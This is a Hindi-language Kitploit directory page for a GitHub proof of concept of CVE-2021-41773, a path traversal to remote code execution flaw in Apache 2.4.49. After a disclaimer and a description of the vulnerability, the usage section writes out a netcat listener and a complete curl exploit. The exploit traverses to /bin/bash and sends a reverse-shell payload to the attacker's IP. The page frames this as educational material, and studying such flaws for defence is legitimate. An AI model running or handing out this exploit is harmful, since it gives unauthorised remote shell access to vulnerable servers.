Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

CVE-2021-41773 के लिए शैक्षिक प्रमाण-अवधारणा, जो Apache HTTP Server 2.4.49 पर रिवर्स शेल पेलोड के साथ पथ ट्रैवर्सल से रिमोट कोड निष्पादन तक प्रदर्शित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-41773 – अपाचे HTTP सर्वर 2.4.49 रिमोट कोड निष्पादन

⚠️ अस्वीकरण
यह रिपॉजिटरी केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
यहां प्रदान की गई जानकारी और कोड का उपयोग नियंत्रित वातावरण में किया जा सकता है, जैसे निजी प्रयोगशाला मशीनें।
उन सिस्टमों के खिलाफ इस कोड का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है।


🔍 कमजोरी के बारे में

CVE-2021-41773 अपाचे HTTP सर्वर संस्करण 2.4.49 को प्रभावित करता है।
पथ सामान्यीकरण में अनुचित इनपुट सत्यापन के कारण, एक हमलावर %2e जैसे एन्कोडेड वर्णों का उपयोग करके पथ ट्रैवर्सल का शोषण करके मनमानी फाइलों तक पहुंच सकता है।
यदि CGI सक्षम है, तो इस कमजोरी को अप्रमाणित रिमोट कोड निष्पादन (RCE) तक बढ़ाया जा सकता है।

  • कमजोरी का प्रकार: पथ ट्रैवर्सल से रिमोट कोड निष्पादन
  • प्रभावित संस्करण: Apache 2.4.49
  • प्रमाणीकरण आवश्यक: ❌ नहीं
  • गंभीरता: गंभीर
  • CVSS स्कोर: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 संदर्भ

  • अपाचे सुरक्षा सलाह
  • एक्सप्लॉइट-डीबी – 50383
  • गिटहब PoC
  • NVD CVE रिपोर्ट

🛠 शोषण अवलोकन

पथ ट्रैवर्सल दोष का शोषण करने के लिए एक दुर्भावनापूर्ण curl अनुरोध तैयार किया जाता है। जब CGI सक्षम होता है, तो हमलावर /bin/bash तक पहुंच सकते हैं और मनमानी शेल कमांड चला सकते हैं।
इस उदाहरण में, सर्वर से शेल एक्सेस प्राप्त करने के लिए एक रिवर्स शेल पेलोड भेजा जाता है।


💥 प्रदर्शन

यह शोषण एक निजी प्रयोगशाला वातावरण में परीक्षण किया गया था। नीचे चरण और परिणाम दिए गए हैं।

1. अपाचे संस्करण का पता लगाना

एक Nmap स्कैन ने Apache/2.4.49 चलाने वाले लक्ष्य की पहचान की।

अपाचे संस्करण


2. शोषण निष्पादन

एक क्राफ्टेड curl कमांड का उपयोग करके एक रिवर्स शेल पेलोड वितरित किया गया।

शोषण निष्पादन


3. रिवर्स शेल प्राप्त हुआ

हमलावर के लिसनर पर सफलतापूर्वक एक रिवर्स शेल प्राप्त हुआ।

रिवर्स शेल


📂 शोषण उपयोग

चरण 1: Netcat लिसनर प्रारंभ करें

root@kitploit:~
nc -nvlp 4444

चरण 1: शोषण चलाएं

root@kitploit:~
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'

✔️ सुनिश्चित करें:

  • अपाचे संस्करण 2.4.49 है
  • CGI सक्षम है
  • पोर्ट 4444 (या आपका चुना हुआ पोर्ट) फ़ायरवॉल के माध्यम से खुला है

📖 मीडियम ब्लॉग

मेरे मीडियम पोस्ट पर विस्तृत वॉकथ्रू और सिद्धांत देखें:
👉 मीडियम पर ब्लॉग पढ़ें

टूल डाउनलोड करें